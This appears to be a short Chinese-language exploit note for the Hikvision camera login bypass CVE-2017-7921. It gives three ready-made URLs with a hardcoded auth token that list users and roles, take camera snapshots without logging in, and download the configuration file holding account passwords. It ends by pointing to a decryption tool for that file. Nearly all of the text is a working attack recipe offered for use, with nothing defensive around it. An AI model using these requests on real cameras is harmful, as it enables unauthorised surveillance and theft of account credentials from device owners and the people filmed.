海康威视(Hikvision)登陆绕过CVE-2017-7921
1、检索所有用户及其角色的列表
http://ip/Security/users?auth=YWRtaW46MTEK
2、在没有身份验证的情况下获取摄像头快照
http://ip/onvif-http/snapshot?auth=YWRtaW46MTEK
3、下载摄像头配置账号密码文件
http://ip/System/configurationFile?auth=YWRtaW46MTEK
4、下载后解密即可,二进制文件使用HEX编辑器查看
解密软件下载地址
https://github.com/WormChickenWizard/hikvision-decrypter